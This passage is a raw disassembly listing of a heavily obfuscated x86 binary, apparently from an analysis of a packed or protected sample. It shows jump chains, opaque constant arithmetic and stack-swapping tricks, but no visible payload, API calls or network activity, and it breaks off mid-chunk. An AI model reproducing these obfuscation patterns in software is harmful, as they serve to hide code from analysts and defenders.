; END OF FUNCTION CHUNK FOR sub_429318
; =============== S U B R O U T I N E =======================================
sub_42BD51 proc near ; CODE XREF: _7hdaygc1:00423523�p
; _7hdaygc1:0042FBF9�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042615C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427CF4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042FBA3 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042FD50 SIZE 00000005 BYTES
xchg esi, [esp-4+arg_0]
pop esi
xor eax, [ebp-8]
xchg esi, [esp-8+arg_4]
push esi
pop edx
jmp loc_42615C
sub_42BD51 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428498
loc_42BD62: ; CODE XREF: sub_428498-1852�j
jle loc_42EE2C
jmp loc_42BA3B
; END OF FUNCTION CHUNK FOR sub_428498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42BD6D: ; CODE XREF: sub_4291EA:loc_42C37C�j
push edx
pushf
push 0F6FBC5ACh
pop edx
or edx, 0BB2C31D8h
add edx, 0D6CB0000h
xor edx, 7AEDD513h
add edx, 53D8E311h
jmp loc_42E3B1
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42BD92: ; CODE XREF: sub_424963+338C�j
cmp eax, [ebp-8]
jnz loc_42D0B8
mov eax, [ebp-14h]
push offset sub_42CC76
jmp loc_42F92B
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AD16
loc_42BDA8: ; CODE XREF: sub_42AD16+10�j
call sub_4272CF
loc_42BDAD: ; CODE XREF: _7hdaygc1:00429C42�j
jb nullsub_43
mov esi, eax
add ebx, 6BD2F486h
loc_42BDBB: ; CODE XREF: sub_425F27:loc_429C2F�j
sub eax, 0B56FC504h
add eax, 177DA5E7h
add eax, ebp
jmp loc_428298
; END OF FUNCTION CHUNK FOR sub_42AD16
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42BDCF proc near ; CODE XREF: _7hdaygc1:0042832E�j
; sub_424963+8BDB�p
xchg ebx, [esp+0]
pop ebx
push eax
call sub_424963
loc_42BDD9: ; CODE XREF: sub_429532-5E4D�j
jmp loc_429538
sub_42BDCF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426EBD
loc_42BDDE: ; CODE XREF: sub_426EBD+7�j
and ebx, ds:4000F1h
sub ebx, 0C3499FC0h
add ebx, 68238FE3h
and ebx, 45F50CB0h
jmp loc_4235FE
; END OF FUNCTION CHUNK FOR sub_426EBD
; ---------------------------------------------------------------------------
loc_42BDFB: ; CODE XREF: _7hdaygc1:0042C55B�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42BDFD: ; CODE XREF: _7hdaygc1:0042D0F6�j
jmp loc_42907B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17C
loc_42BE02: ; CODE XREF: sub_42A17C+2075�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_42A17C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_42BE07: ; CODE XREF: sub_42BB83-7523�j
jmp loc_424FAF
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
loc_42BE0C: ; CODE XREF: _7hdaygc1:0042D2FA�j
add ebx, eax
call sub_425BCD
; START OF FUNCTION CHUNK FOR sub_423172
loc_42BE13: ; CODE XREF: sub_423172:loc_42DA57�j
mov eax, [ebp-8]
mov ecx, 0Ah
cdq
jz loc_425FB4
idiv ecx
jmp loc_42AF9A
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_42BE29 proc near ; DATA XREF: sub_42FA3D-2BB2�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042A57D SIZE 00000016 BYTES
add eax, 66BB5C3Fh
mov eax, [eax]
xor edx, edx
mov [eax+4], edx
mov edx, [ebp-4]
jmp loc_42A57D
sub_42BE29 endp
; ---------------------------------------------------------------------------
loc_42BE3E: ; CODE XREF: _7hdaygc1:004285AE�j
; _7hdaygc1:00429E42�j
jge loc_426FDB
or edx, 0E9E2E825h
popf
loc_42BE4B: ; CODE XREF: _7hdaygc1:loc_4254AA�j
rol ebx, 7
xor ebx, 577EEAE6h
add ebp, ebx
pop ebx
jmp loc_424574
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42BE5D: ; CODE XREF: _7hdaygc1:0042BBF7�j
jmp loc_424DB8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42BE63 proc near ; CODE XREF: sub_4290DB+9�j
var_6C = dword ptr -6Ch
var_60 = dword ptr -60h
; FUNCTION CHUNK AT 0042430E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AC35 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042B410 SIZE 00000005 BYTES
add esp, 0FFFFFFA0h
lea eax, sub_4290DB
mov [ebp-8], eax
push 1Ch
lea eax, [ebp-60h]
push eax
mov eax, [ebp-8]
jmp loc_42430E
sub_42BE63 endp
; =============== S U B R O U T I N E =======================================
sub_42BE7D proc near ; CODE XREF: sub_42ABF7+B�p
; _7hdaygc1:0042C2C1�j
; FUNCTION CHUNK AT 00425600 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042C72A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042DBE8 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042E8BE SIZE 0000000D BYTES
xchg eax, [esp+0]
pop eax
jnz loc_42C72A
lea edx, [ebp-14h]
mov eax, offset dword_427CB0
call sub_42AA07
jmp loc_425600
sub_42BE7D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42BE99: ; CODE XREF: _7hdaygc1:00425219�j
rol eax, 19h
or eax, 5F355175h
add eax, 0A0CC5533h
mov eax, [eax]
or eax, eax
jnz loc_42665D
jmp loc_425CBB
; ---------------------------------------------------------------------------
call sub_42FA48
; START OF FUNCTION CHUNK FOR sub_426008
loc_42BEBC: ; CODE XREF: sub_426008+7�j
jmp loc_42E978
; END OF FUNCTION CHUNK FOR sub_426008
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D85
loc_42BEC1: ; CODE XREF: sub_425D85+E�j
jmp loc_42E7B3
; END OF FUNCTION CHUNK FOR sub_425D85
; =============== S U B R O U T I N E =======================================
sub_42BEC6 proc near ; CODE XREF: _7hdaygc1:00425DBC�j
; sub_4295F7+17�p
; FUNCTION CHUNK AT 004237C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042410F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425900 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042968C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D3AD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042D5C3 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
add edx, 0E52EEF79h
mov edx, [edx]
popf
xor eax, edx
jmp loc_42410F
sub_42BEC6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42BEDA proc near ; CODE XREF: _7hdaygc1:00423FC5�j
; _7hdaygc1:0042DB0B�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042BC02 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CA55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D44C SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
push ecx
mov ecx, edi
jmp loc_42CA55
sub_42BEDA endp
; ---------------------------------------------------------------------------
or ecx, eax
jmp loc_42B747
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4297B2
loc_42BEED: ; CODE XREF: sub_4297B2+7�j
mov large fs:0, esp
mov eax, [eax]
mov eax, 1
jmp loc_4297A2
; END OF FUNCTION CHUNK FOR sub_4297B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add eax, offset nullsub_3
call sub_42E32F
loc_42BF0B: ; CODE XREF: _7hdaygc1:0042DD38�j
test byte ptr [eax-8], 10h
jz loc_42E2FB
inc dword ptr [ebp-8]
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_42BF18: ; CODE XREF: sub_425C2C:loc_42BC99�j
; sub_42F7B5+4�j
mov eax, [ebp-8]
jmp loc_42D869
; END OF FUNCTION CHUNK FOR sub_425C2C
; =============== S U B R O U T I N E =======================================
sub_42BF20 proc near ; DATA XREF: sub_42B034-78A7�o
; FUNCTION CHUNK AT 004297DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DEAF SIZE 00000005 BYTES
mov [ecx], eax
loc_42BF22: ; CODE XREF: _7hdaygc1:loc_4235A8�j
pop ecx
push 0F8h
mov eax, [ebp-4]
push eax
jmp loc_4297DE
sub_42BF20 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42BF31: ; CODE XREF: _7hdaygc1:00425C77�j
retn
; ---------------------------------------------------------------------------
loc_42BF32: ; CODE XREF: _7hdaygc1:0042DFF7�j
jmp sub_42C1AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42BF37: ; CODE XREF: sub_426130:loc_42D8E4�j
; sub_426130+77C6�j
add ebx, 477C8Bh
xchg ebx, [esp+4+var_4]
jmp sub_424BE6
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42BF45: ; CODE XREF: sub_42C443+B61�j
jz loc_426245
jmp loc_425687
; END OF FUNCTION CHUNK FOR sub_42C443
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42BF51: ; CODE XREF: sub_425E64+694F�j
jmp loc_42B667
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42BF56: ; CODE XREF: sub_426130-119C�j
jmp loc_4261BC
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_42BF5B: ; CODE XREF: sub_4232DA+C9A5�j
jns loc_42D42F
mov ebx, ecx
cdq
loc_42BF64: ; CODE XREF: sub_4232DA:loc_42C65E�j
call sub_42DB44
loc_42BF69: ; CODE XREF: _7hdaygc1:0042CA99�j
jmp sub_42DBEA
; END OF FUNCTION CHUNK FOR sub_4232DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42BF6F: ; CODE XREF: _7hdaygc1:loc_42F1BB�j
or edi, 90521132h
popf
jmp loc_429C63
; ---------------------------------------------------------------------------
loc_42BF7B: ; CODE XREF: _7hdaygc1:loc_42E1BD�j
sub ecx, 0E88519D1h
xor ecx, 0CA469E21h
push offset loc_42632A
jmp locret_425E00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E7E
loc_42BF91: ; CODE XREF: sub_424E7E:loc_4248DF�j
mov [ebp-4], eax
xor eax, eax
push esi
push 87BD9DB3h
xchg eax, [esp+0]
mov esi, eax
pop eax
sub esi, 45A61155h
jmp loc_42856C
; END OF FUNCTION CHUNK FOR sub_424E7E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_162. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42BFAE: ; CODE XREF: _7hdaygc1:loc_42E588�j
jz loc_428CA2
jmp loc_42DC24
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42BFB9: ; CODE XREF: sub_42AA47-75C4�j
push 167D06E2h
pop eax
add eax, 5D6D46C9h
cmp eax, 36170A03h
jmp loc_42492A
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
loc_42BFD0: ; CODE XREF: _7hdaygc1:loc_42EE00�j
sub ecx, 0A9520F39h
jmp sub_42B0DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_42BFDB: ; CODE XREF: sub_425BAD-1161�j
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_425BAD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BFDF proc near ; CODE XREF: sub_427D8E-3353�p
; sub_425BAD+8F8�p
push ebp
mov ebp, esp
jmp sub_42ED2A
sub_42BFDF endp
; ---------------------------------------------------------------------------
loc_42BFE7: ; CODE XREF: _7hdaygc1:0042F732�j
pop edx
and edx, 3161D273h
jnz loc_42A21D
jp loc_42F3D0
shr edi, 0Ah
jmp loc_42A21C
; =============== S U B R O U T I N E =======================================
sub_42C002 proc near ; CODE XREF: sub_424AE1+5691�p
; _7hdaygc1:0042C114�j
; FUNCTION CHUNK AT 004273D9 SIZE 0000000A BYTES
xchg esi, [esp+0]
pop esi
add esi, 10A59B3Dh
call sub_42F30D
loc_42C011: ; CODE XREF: sub_42E41D+19�j
jmp loc_4273D9
sub_42C002 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C016: ; CODE XREF: _7hdaygc1:0042919E�j
jmp loc_42EF1F
; ---------------------------------------------------------------------------
popf
adc esi, ebp
jmp sub_428A2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1F1
loc_42C023: ; CODE XREF: sub_42E1F1:loc_42E200�j
test al, al
loc_42C025: ; CODE XREF: sub_42A4F1:loc_426386�j
jnz loc_42C78F
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
push offset loc_426BA2
jmp loc_42B29F
; END OF FUNCTION CHUNK FOR sub_42E1F1
; ---------------------------------------------------------------------------
push eax
pop edx
xor eax, eax
call sub_428B11
push ebp
jmp loc_42D85A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_42C04A: ; CODE XREF: sub_42CDF7-8D09�j
push 510DA982h
pop ecx
xor ecx, 0FA246CF2h
or ecx, 95A72F3Eh
sub ecx, 0D1C3CD74h
add ecx, 12569E31h
popf
jmp loc_42D96C
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
loc_42C06E: ; CODE XREF: _7hdaygc1:004289BC�j
jnz loc_42B78A
cmp edi, eax
jmp loc_423843
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42C07B: ; CODE XREF: sub_429318:loc_429F00�j
cdq
jbe loc_42305A
or eax, 1ADEFA99h
and ecx, eax
pushf
jmp loc_42AFBF
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42C090: ; CODE XREF: sub_42E283-47C8�j
jbe loc_42C360
mov edx, [eax]
jmp loc_42A269
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_42C09D: ; CODE XREF: sub_4268D9:loc_42D0D0�j
and eax, 975A41B9h
rol eax, 1Dh
xor eax, 0C8950591h
call sub_42F152
loc_42C0B1: ; CODE XREF: sub_428498+1B5B�j
jl loc_424195
; END OF FUNCTION CHUNK FOR sub_4268D9
; START OF FUNCTION CHUNK FOR sub_42C48C
loc_42C0B7: ; CODE XREF: sub_42C48C+A�j
jmp loc_42589C
; END OF FUNCTION CHUNK FOR sub_42C48C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_42C0BC: ; CODE XREF: sub_42C26B-8621�j
jmp loc_428A76
; END OF FUNCTION CHUNK FOR sub_42C26B
; ---------------------------------------------------------------------------
popf
jmp loc_424193
; ---------------------------------------------------------------------------
loc_42C0C7: ; CODE XREF: _7hdaygc1:loc_42425B�j
push 1Ch
push 5CC5F89Fh
pop eax
and eax, 29B68391h
xor eax, 1CF8AC47h
add eax, 0F93D1E32h
add eax, ebp
add eax, 0F246B4C4h
jmp loc_42E593
; ---------------------------------------------------------------------------
loc_42C0EE: ; DATA XREF: _7hdaygc1:0042848E�o
dec dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 0
jg loc_427276
; START OF FUNCTION CHUNK FOR sub_429318
loc_42C0FB: ; CODE XREF: sub_429318:loc_4254E6�j
jmp loc_42E8C6
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
loc_42C100: ; CODE XREF: _7hdaygc1:00425027�j
shr eax, 5
jmp loc_429101
; ---------------------------------------------------------------------------
jnb loc_425756
sbb ebp, 0A6E2F821h
jmp sub_42C002
; =============== S U B R O U T I N E =======================================
sub_42C119 proc near ; CODE XREF: _7hdaygc1:0042334B�j
; sub_4291A3+5044�p
; FUNCTION CHUNK AT 00427D7C SIZE 0000000D BYTES
xchg edi, [esp+0]
pop edi
mov al, [eax]
sub al, 99h
mov edx, ds:dword_425154
imul byte ptr [edx]
jmp loc_427D7C
sub_42C119 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428613
loc_42C12E: ; CODE XREF: sub_428613+6�j
push 63833667h
pop ebx
xor ebx, 5DDFE43Eh
sub ebx, 0F067B115h
xor ebx, 9F6109C9h
rol ebx, 1Bh
call sub_425459
loc_42C14E: ; CODE XREF: sub_42E973-4A85�j
jmp loc_42D1E2
; END OF FUNCTION CHUNK FOR sub_428613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42C153: ; CODE XREF: sub_425752+3B0F�j
jmp loc_42C80B
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_42C158: ; CODE XREF: sub_42D84A:loc_427218�j
jmp nullsub_88
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
loc_42C15D: ; CODE XREF: _7hdaygc1:loc_42C677�j
xchg edi, [edx]
jmp sub_427EF6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42C164: ; CODE XREF: sub_4291EA-3CCD�j
call sub_42B650
locret_42C169: ; CODE XREF: _7hdaygc1:loc_42EF36�j
retn
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429D1B
loc_42C16A: ; CODE XREF: sub_429D1B:loc_429D2B�j
jmp loc_424FC5
; END OF FUNCTION CHUNK FOR sub_429D1B
; =============== S U B R O U T I N E =======================================
sub_42C16F proc near ; CODE XREF: sub_426738+A�j
; sub_429318-270F�p ...
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042307D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423608 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423C5D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423EE5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00424906 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00424A72 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042591F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00425991 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426157 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004269AC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426BBF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042705B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427DA3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004280CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428174 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283A6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428404 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042850C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042883F SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00428A43 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428A8E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428E85 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428FA0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004294F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042982A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A0D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A276 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A2C9 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042B6A2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042B8BE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042C62C SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0042C9EA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042D045 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042D158 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042D6F0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D702 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DCEE SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042DD55 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042DDB5 SIZE 00000017 BYTES
push edx
mov edx, ebp
jmp loc_424A72
sub_42C16F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42C177 proc near ; DATA XREF: sub_424FE5:loc_425F30�o
push eax
call sub_42D85F
jmp loc_424A75
sub_42C177 endp
; ---------------------------------------------------------------------------
push 65A3AACFh
pop eax
or eax, 54461436h
xor eax, 847B9505h
and eax, 8752AE52h
loc_42C19A: ; CODE XREF: _7hdaygc1:loc_42B2FD�j
jmp loc_42A578
; ---------------------------------------------------------------------------
loc_42C19F: ; DATA XREF: _7hdaygc1:0042ECE5�o
push esi
mov esi, eax
xchg esi, [esp]
ror eax, 11h
mov ds:dword_423B18, eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C1AF proc near ; CODE XREF: sub_42BAE7:loc_423129�j
; sub_42C50D-87C9�p ...
; FUNCTION CHUNK AT 0042BA89 SIZE 00000011 BYTES
push ebp
mov ebp, esp
jmp loc_42BA89
sub_42C1AF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub eax, ebp
; START OF FUNCTION CHUNK FOR sub_424963
loc_42C1B9: ; CODE XREF: sub_424963+8A66�j
jmp sub_4241F3
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
jno loc_429F4D
; START OF FUNCTION CHUNK FOR sub_424744
loc_42C1C4: ; CODE XREF: sub_424744+4795�j
jmp sub_424963
; END OF FUNCTION CHUNK FOR sub_424744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42C1C9: ; CODE XREF: sub_42DAE8:loc_42DAF2�j
sub ebx, eax
sbb esi, 5C4ADC2Eh
and edx, ecx
jmp loc_42E837
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17C
loc_42C1D8: ; CODE XREF: sub_42A17C+E19�j
pop ebx
and ebx, 528DA594h
rol ebx, 8
and ebx, 2EA07B93h
add ebx, 0F3C2EB53h
xchg ebx, [esp+0]
jmp loc_42BE02
; END OF FUNCTION CHUNK FOR sub_42A17C
; ---------------------------------------------------------------------------
loc_42C1F6: ; DATA XREF: sub_42E29B:loc_423C4F�o
or eax, eax
jnz loc_42C9D0
jmp loc_4246C2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42C204: ; CODE XREF: sub_4288FE-2BDD�j
jmp sub_429557
; END OF FUNCTION CHUNK FOR sub_4288FE
; =============== S U B R O U T I N E =======================================
sub_42C209 proc near ; DATA XREF: sub_429CCF+5BBB�o
; FUNCTION CHUNK AT 00423512 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428475 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428DC3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00429244 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429734 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042D12D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042EE31 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F204 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042FCF8 SIZE 00000019 BYTES
pop ebp
cmp dword ptr [ebp-8], 0
jnz loc_429734
jmp loc_42EE31
sub_42C209 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_42C219: ; CODE XREF: sub_424AA8:loc_427C8D�j
jge loc_42AF52
; END OF FUNCTION CHUNK FOR sub_424AA8
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42C21F: ; CODE XREF: sub_425A37+5351�j
jmp loc_425A85
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42936E
loc_42C224: ; CODE XREF: sub_42936E+37C�j
jmp nullsub_183
; END OF FUNCTION CHUNK FOR sub_42936E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428802
loc_42C229: ; CODE XREF: sub_428802+6�j
jmp loc_423D30
; END OF FUNCTION CHUNK FOR sub_428802
; ---------------------------------------------------------------------------
loc_42C22E: ; CODE XREF: _7hdaygc1:00424CAC�j
; _7hdaygc1:loc_42BBC1�j
jmp loc_428310
; ---------------------------------------------------------------------------
add ebx, 41A36D7Ah
pushf
sub ebp, 0C8307070h
jmp loc_42AF52
; ---------------------------------------------------------------------------
loc_42C245: ; DATA XREF: sub_42E283-8CAC�o
mov esp, ebp
push offset sub_428B75
jmp locret_428839
; ---------------------------------------------------------------------------
sub edx, 0F4DBE30Dh
jmp sub_42CFDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A1B6
loc_42C25C: ; CODE XREF: sub_42A1B6-C39�j
push edx
loc_42C25D: ; CODE XREF: sub_42A1B6:loc_42B4CA�j
mov eax, [ebp-24h]
push edi
push 761B633h
jmp loc_4259B5
; END OF FUNCTION CHUNK FOR sub_42A1B6
; =============== S U B R O U T I N E =======================================
sub_42C26B proc near ; CODE XREF: sub_42EF3C:loc_42EED0�j
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00423393 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423C38 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004261C9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426BE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428142 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428A76 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042A6D3 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042C0BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C400 SIZE 00000005 BYTES
push ebp
mov ebp, edx
xchg ebp, [esp+4+var_4]
push eax
mov eax, esi
xchg eax, [esp+8+var_8]
mov esi, eax
xchg esi, [esp+8+var_8]
jmp loc_42C400
sub_42C26B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C281: ; CODE XREF: _7hdaygc1:0042442B�j
jge loc_42AC5B
or ebp, 5BF0EA17h
jmp loc_424C53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B11
loc_42C292: ; CODE XREF: sub_428B11+29B4�j
shr esi, 4
push 534747E8h
jmp loc_42F6D8
; END OF FUNCTION CHUNK FOR sub_428B11
; ---------------------------------------------------------------------------
push ebp
and eax, 94AE3D4Eh
jmp sub_4273E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42C2AB: ; CODE XREF: sub_42C7F3-72B2�j
rol ecx, 19h
sub esi, edx
test eax, 7566CB13h
jmp loc_426C4B
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
and edx, 0DAFAACC6h
jmp sub_42BE7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42C2C6: ; CODE XREF: sub_4291EA-3D09�j
js loc_426D92
loc_42C2CC: ; CODE XREF: sub_4291EA:loc_42C990�j
call sub_42D757
mov edx, 5180B1FCh
call sub_42C1AF
push offset loc_425504
jmp loc_424E33
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
